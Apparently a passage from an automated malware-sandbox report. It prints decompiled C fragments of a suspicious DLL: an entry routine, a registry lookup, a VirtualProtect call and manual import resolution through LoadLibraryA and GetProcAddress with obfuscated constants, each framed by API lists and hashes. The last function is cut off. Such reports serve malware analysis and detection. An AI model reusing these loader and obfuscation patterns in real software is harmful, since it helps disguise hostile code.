                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1311E13A600208FFEB049BE5DE80BAD77B8EB44325F60C022E409DA090D3759E829B61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00A7779E(void* __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                                                                    				int _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				short* _t31;
                                                                                                                                                                                                                                                                                    				short* _t34;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t15 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t3 = _t15 + 0xa7ba60; // 0x4f0053
                                                                                                                                                                                                                                                                                    				_v16 = 4;
                                                                                                                                                                                                                                                                                    				_t31 = E00A74C7C(__ecx, _t3);
                                                                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                                                                    					_t19 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    					_t5 = _t19 + 0xa7babc; // 0x6e0049
                                                                                                                                                                                                                                                                                    					_t34 = E00A74C7C(__ecx, _t5);
                                                                                                                                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                                                                                                                                    						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                                                                                                                                                                                                                                                                    						if(_t24 == 0) {
                                                                                                                                                                                                                                                                                    							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                                                                                                                                                                                                                                                                    							if(_t29 != 0) {
                                                                                                                                                                                                                                                                                    								_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							RegCloseKey(_v12);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00A72A03(_t34);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00A72A03(_t31);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A777C1,004F0053,00000000,?), ref: 00A74C85
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A777C1,004F0053,00000000,?), ref: 00A74CAF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74C7C: memset.NTDLL ref: 00A74CC3
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00A777F0
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00A7780C
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A7781D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 830012212-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 76bfdbc80d618b126ae43fe831e192dab488013774b1303717e44b323505f2e5
                                                                                                                                                                                                                                                                                    • Instruction ID: 39b1a8267f2bd3ed321f82c208bae03924d97c4ed57842d914eb99719cbc269c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76bfdbc80d618b126ae43fe831e192dab488013774b1303717e44b323505f2e5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B116172900209BFD711DBD8DD89FEEB7BCAB54340F10C059B609E7061E7709A458B65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182968404.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID: *
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-163128923
                                                                                                                                                                                                                                                                                    • Opcode ID: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
                                                                                                                                                                                                                                                                                    • Instruction ID: 1af9be0c50490d788411db38c00b1ab38a0aeee472bf7b6596d62abcdbc9949e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD11674908518EFCB08CF99C198AACBBF2FF8A300F50E55AE445AB359D7345A42CF55
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                    			E00A77471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t40 = E00A7344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                                                                                                    						_t68 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    						_t20 = _t68 + 0xa7b1fc; // 0x740053
                                                                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    							_t76 = E00A72986(_a4);
                                                                                                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                    								_t65 = _a28;
                                                                                                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t57 = __imp__#6;
                                                                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x00a77523
                                                                                                                                                                                                                                                                                    0x00a77533
                                                                                                                                                                                                                                                                                    0x00a77533
                                                                                                                                                                                                                                                                                    0x00a7751c
                                                                                                                                                                                                                                                                                    0x00a77515
                                                                                                                                                                                                                                                                                    0x00a77535
                                                                                                                                                                                                                                                                                    0x00a7753a
                                                                                                                                                                                                                                                                                    0x00a7753f
                                                                                                                                                                                                                                                                                    0x00a7753f
                                                                                                                                                                                                                                                                                    0x00a77545
                                                                                                                                                                                                                                                                                    0x00a7754b
                                                                                                                                                                                                                                                                                    0x00a77550
                                                                                                                                                                                                                                                                                    0x00a77550
                                                                                                                                                                                                                                                                                    0x00a77555
                                                                                                                                                                                                                                                                                    0x00a7755a
                                                                                                                                                                                                                                                                                    0x00a7755a
                                                                                                                                                                                                                                                                                    0x00a77555
                                                                                                                                                                                                                                                                                    0x00a774df
                                                                                                                                                                                                                                                                                    0x00a7755c
                                                                                                                                                                                                                                                                                    0x00a77562
                                                                                                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 00A7344C: SysAllocString.OLEAUT32(80000002), ref: 00A734A3
  • Part of subcall function 00A7344C: SysFreeString.OLEAUT32(00000000), ref: 00A73508
• SysFreeString.OLEAUT32(?), ref: 00A77550
• SysFreeString.OLEAUT32(00A720DE), ref: 00A7755A
Memory Dump Source
• Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
• Opcode ID: 299bccc60ad99af7ecd0a2657e4492a00edb8cb3234b743d931a1cad79778f7e
• Instruction ID: 50f99fbd58fe213e172b3dff2c5501b4e8261f0e24beda58747bc8a0de1555ef
• Opcode Fuzzy Hash: 299bccc60ad99af7ecd0a2657e4492a00edb8cb3234b743d931a1cad79778f7e
• Instruction Fuzzy Hash: 93310772600119AFCB11DFA9CC88C9FBB7AFBC9740715C658F9199B220D632DD51CBA0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E6E051F31(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()** _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				signed short _v24;
                                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                                    				signed short _t51;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t53;
                                                                                                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t55;
                                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                                                                                                    				signed short* _t73;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t69 = __edi;
                                                                                                                                                                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t59 =  *0x6e0541cc;
                                                                                                                                                                                                                                                                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                                                                    					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                                                                    					_v12 = _t45;
                                                                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                                                                    					if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                                                                    							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                                                                                                                                    							_v28 = _t47;
                                                                                                                                                                                                                                                                                    							if(_t47 == 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                                                    							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                                                    							_t49 = _v12;
                                                                                                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                                                                    							_t50 =  *_t49;
                                                                                                                                                                                                                                                                                    							if(_t50 != 0) {
                                                                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                                                                    								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                                                                    								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									_t51 =  *_t73;
                                                                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                                                                                                                                                    										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                                                                    										if(_t51 < _t69) {
                                                                                                                                                                                                                                                                                    											L12:
                                                                                                                                                                                                                                                                                    											_t21 =  &_v8;
                                                                                                                                                                                                                                                                                    											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    											__eflags =  *_t21;
                                                                                                                                                                                                                                                                                    											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											_t65 = _a4;
                                                                                                                                                                                                                                                                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                                                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                                                                    												goto L12;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												goto L11;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                                                                                                    										_v8 = _t51;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t53 = _v8;
                                                                                                                                                                                                                                                                                    									__eflags = _t53;
                                                                                                                                                                                                                                                                                    									if(_t53 == 0) {
                                                                                                                                                                                                                                                                                    										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t54 = _t53 + 2;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                                                                    									__eflags = _t55;
                                                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                    										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t68 = _v8;
                                                                                                                                                                                                                                                                                    										__eflags = _t68;
                                                                                                                                                                                                                                                                                    										if(_t68 != 0) {
                                                                                                                                                                                                                                                                                    											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *_v16 = _t55;
                                                                                                                                                                                                                                                                                    										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                                                                                                                                    										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                                                                    										_t32 =  &_v16;
                                                                                                                                                                                                                                                                                    										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                                                                    										__eflags =  *_t32;
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t50 = _t61;
                                                                                                                                                                                                                                                                                    								if(_t61 != 0) {
                                                                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                                                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                                                                                                                                    						__eflags = _t60;
                                                                                                                                                                                                                                                                                    						_v20 = _t60;
                                                                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L27:
                                                                                                                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                                                                    0x6e051fb6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051fb6
                                                                                                                                                                                                                                                                                    0x6e051fa4
                                                                                                                                                                                                                                                                                    0x6e051fa4
                                                                                                                                                                                                                                                                                    0x6e051fb8
                                                                                                                                                                                                                                                                                    0x6e051fb8
                                                                                                                                                                                                                                                                                    0x6e051fb8
                                                                                                                                                                                                                                                                                    0x6e051fc7
                                                                                                                                                                                                                                                                                    0x6e051fca
                                                                                                                                                                                                                                                                                    0x6e051fcc
                                                                                                                                                                                                                                                                                    0x6e051fd3
                                                                                                                                                                                                                                                                                    0x6e051fce
                                                                                                                                                                                                                                                                                    0x6e051fce
                                                                                                                                                                                                                                                                                    0x6e051fce
                                                                                                                                                                                                                                                                                    0x6e051fdb
                                                                                                                                                                                                                                                                                    0x6e051fe1
                                                                                                                                                                                                                                                                                    0x6e051fe3
                                                                                                                                                                                                                                                                                    0x6e052013
                                                                                                                                                                                                                                                                                    0x6e051fe5
                                                                                                                                                                                                                                                                                    0x6e051fe5
                                                                                                                                                                                                                                                                                    0x6e051fe8
                                                                                                                                                                                                                                                                                    0x6e051fea
                                                                                                                                                                                                                                                                                    0x6e051ff2
                                                                                                                                                                                                                                                                                    0x6e051ff2
                                                                                                                                                                                                                                                                                    0x6e051ff7
                                                                                                                                                                                                                                                                                    0x6e051ff9
                                                                                                                                                                                                                                                                                    0x6e052000
                                                                                                                                                                                                                                                                                    0x6e052002
                                                                                                                                                                                                                                                                                    0x6e052002
                                                                                                                                                                                                                                                                                    0x6e052002
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052002
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051fe3
                                                                                                                                                                                                                                                                                    0x6e051f92
                                                                                                                                                                                                                                                                                    0x6e051f94
                                                                                                                                                                                                                                                                                    0x6e051f96
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e051f96
                                                                                                                                                                                                                                                                                    0x6e052016
                                                                                                                                                                                                                                                                                    0x6e052016
                                                                                                                                                                                                                                                                                    0x6e05201d
                                                                                                                                                                                                                                                                                    0x6e052022
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052028
                                                                                                                                                                                                                                                                                    0x6e052033
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052033
                                                                                                                                                                                                                                                                                    0x6e05202a
                                                                                                                                                                                                                                                                                    0x6e05202a
                                                                                                                                                                                                                                                                                    0x6e052030
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052030
                                                                                                                                                                                                                                                                                    0x6e051f5e
                                                                                                                                                                                                                                                                                    0x6e052034
                                                                                                                                                                                                                                                                                    0x6e052039

APIs
• LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69
• GetProcAddress.KERNEL32(?,00000000), ref: 6E051FDB
Memory Dump Source
• Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
Similarity
• API ID: AddressLibraryLoadProc
• String ID:
• API String ID: 2574300362-0
• Opcode ID: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
• Instruction ID: 247a33f3aa2b283abb733da0036396871d792ef1f23ab563205e53c8ac8a547d
• Opcode Fuzzy Hash: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
• Instruction Fuzzy Hash: AB313471A0120ADFEB44CF99CA84BAEB7F4BF09344B104069D811E7341E774DA64CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
_entry_(intOrPtr _a4, intOrPtr _a8) {
	intOrPtr _t4;
	void* _t10;
	signed int _t11;
	void* _t13;

	_t13 = 1;
	_t4 = _a8;
	if(_t4 == 0) {
		if(InterlockedDecrement(0xa7a294) == 0) {
			E00A71547();
		}
	} else {
		if(_t4 == 1 && InterlockedIncrement(0xa7a294) == 1) {
			_t10 = E00A74430(_t11, _a4); // executed
			if(_t10 != 0) {
				_t13 = 0;
			}
		}
	}
	return _t13;
}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00A7A294), ref: 00A741E5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00A74445
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00A7A294), ref: 00A74205
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3834848776-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5d70822242bad6384a169db10a34712943a5f0e193b847bbdb2dd95f96ef4d7a
                                                                                                                                                                                                                                                                                    • Instruction ID: 6eb9450eab79da3529dcaae80cdc9bfe9832fc926fb8fec784a6abeee1c03b91
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d70822242bad6384a169db10a34712943a5f0e193b847bbdb2dd95f96ef4d7a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47E086313D4122A7C62157A49C08BDEA764BF59F85F00C414B84DE1063F720CCA2C6F1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                    			E6E051C12(void* __ecx) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed short _t15;
                                                                                                                                                                                                                                                                                    				char* _t18;
                                                                                                                                                                                                                                                                                    				char* _t25;
                                                                                                                                                                                                                                                                                    				char* _t29;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_t25 = 0;
                                                                                                                                                                                                                                                                                    				if(E6E051112( &_v8,  &_v12,  *0x6e0541cc ^ 0x196db149) != 0) {
                                                                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    						_t29 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t29 = E6E051BCB(_t22, _v8,  *0x6e0541cc ^ 0x6e49bbff);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t29 != 0) {
                                                                                                                                                                                                                                                                                    						_t15 = E6E051566(_t22); // executed
                                                                                                                                                                                                                                                                                    						_v12 = _t15 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                                                                                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    							_t25 = 0x657;
                                                                                                                                                                                                                                                                                    						}
